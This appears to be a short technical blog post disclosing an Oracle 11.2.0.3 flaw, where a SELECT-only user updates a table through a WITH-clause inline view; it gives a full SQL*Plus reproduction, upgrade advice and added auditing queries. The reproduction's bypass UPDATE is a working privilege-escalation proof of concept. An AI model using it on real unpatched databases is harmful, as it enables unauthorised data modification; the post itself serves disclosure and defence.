I'm going to talk about a problem I tested in 11gR2 versions.
Any user with only SELECT privilege on a table can update that table, by issuing the UPDATE against an inline view built with a WITH clause over that table.
You can reproduce it with the following steps in the database.
```
[oracle@oradb ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.3.0 Production on Wed May 6 16:08:48 2015

Copyright (c) 1982, 2011, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

SQL> create user test identified by test;

User created.

SQL> grant create session,create table to test;

Grant succeeded.

SQL> grant select on scott.emp to test;

Grant succeeded.

SQL> exit
Disconnected from Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

[oracle@oradb ~]$ sqlplus test/test

SQL*Plus: Release 11.2.0.3.0 Production on Wed May 6 16:10:05 2015

Copyright (c) 1982, 2011, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

SQL> update (with tmp as (select * from scott.emp) select * from tmp) set sal=1500 where ename='ALLEN';

1 row updated.

SQL> commit;

Commit complete.
```
To resolve this vulnerability, upgrade to 11.2.0.4.5 (or later) at the latest patch level. Note that the user above holds only SELECT on scott.emp, yet the UPDATE through the WITH-clause inline view succeeds and is committed.
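As an added example (not part of the original post), here is what a DBA can run as SYSDBA on an instance that is still on 11.2.0.3 to find which grantees are exposed, to log UPDATE activity on the table until the patch is applied, and to confirm the fix afterwards. It assumes AUDIT_TRAIL is set to DB; scott.emp and the test user are the objects from the post.

```sql
-- Added example, not from the original post. Run as SYSDBA; assumes AUDIT_TRAIL=DB.

-- 1. Grantees that hold SELECT on scott.emp but not UPDATE (direct grants only;
--    grants received through roles would need DBA_ROLE_PRIVS as well).
--    On an unpatched 11.2.0.3 instance each of these can still modify the
--    table through the WITH-clause inline view shown in the post.
select s.grantee, s.owner, s.table_name
  from dba_tab_privs s
 where s.owner = 'SCOTT'
   and s.table_name = 'EMP'
   and s.privilege = 'SELECT'
   and not exists (select 1
                     from dba_tab_privs u
                    where u.grantee    = s.grantee
                      and u.owner      = s.owner
                      and u.table_name = s.table_name
                      and u.privilege  = 'UPDATE');

-- 2. Record every UPDATE on the table, one audit record per statement, so a
--    SELECT-only user writing to it is visible while the patch is pending.
audit update on scott.emp by access;

-- 3. Review the trail: an UPDATE by a grantee returned in step 1 is the
--    privilege bypass being used.
select a.timestamp, a.username, a.owner, a.obj_name, a.action_name
  from dba_audit_trail a
 where a.owner       = 'SCOTT'
   and a.obj_name    = 'EMP'
   and a.action_name = 'UPDATE'
 order by a.timestamp;

-- 4. After upgrading to 11.2.0.4.5 or later, repeat the UPDATE from the post as
--    the TEST user: it is expected to fail with ORA-01031 (insufficient privileges)
--    instead of reporting "1 row updated".
```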